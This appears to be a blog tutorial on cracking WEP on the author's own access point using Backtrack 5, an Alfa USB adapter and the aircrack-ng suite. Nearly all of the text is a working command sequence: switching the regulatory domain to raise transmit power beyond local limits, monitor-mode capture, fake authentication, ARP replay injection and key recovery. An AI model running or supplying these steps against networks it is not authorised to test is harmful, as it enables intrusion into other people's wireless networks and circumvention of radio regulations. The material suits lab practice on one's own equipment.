Ok another WEP cracking guide because I just felt there wasn’t enough out there already 🙂
I am going to crack my wireless access point with a Macbook pro running Backtrack 5 as a virtual machine. To do this in a virtual machine you must use a usb wifi adapter, built in hardware will NOT WORK in a VM.
Watch the video to see it in action and then read the post full the break down
httpvh://www.youtube.com/watch?v=1zBQrkdt45w
My setup is as follows
- Backtrack 5 R1 VM
- USB Alfa AWUS036H (100mW) wifi adapter with 5dB arial (Very cheap off eBay and a lot with free delivery out there)
**For educational purposes only
**Note if you have Ubuntu you can install aircrack-ng and perform the same crack.
sudo apt-get install aircrack-ng
run this command (only if you have a high powered card like the Alfa)
iw reg set NZ
Important to note you may not be able to reach 1000mW depending on the laws set in your country.
ifconfig wlan0 downifconfig wlan0 upiwconfig
If it has worked you should see the TX Power is now at 30dB, we can now get started.
Your wireless adapter must be in monitor mode, most wireless cards require special drivers and the guys behind Backtrack have taken care of this for us.
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 -c 6 –bssid 00:1c:8c:d0:70:ec -w crackme
Leave this window running and open a second terminal, we will fake authenticate our wifi card with the device, if we don’t the replay attack will fail. If there are devices on the network skip to the replay attack.
aireplay mon0 -1 3 -a 00:1c:8c:d0:70:ec
All going well you will see “Association successful :-)”
Now to perform a ARP replay attack which captures a ARP packets and sends it over and over to generate traffic on the access point. Modify your command so it looks like this
aireplay mon0 -3 -b 00:1c:8c:d0:70:ec
Give it some time and all going well you will start to see the “Data” figure from the aircrack window start to increase.
Once that begins its just a matter of time before it’s cracked, you can start cracking the file right away even while data is still begin collected. Open yet a third console and run
aircrack-ng crackme
The password will not be recovered until enough data has been collected, it will automatically retry once the data increases.
Watch the video if you are unclear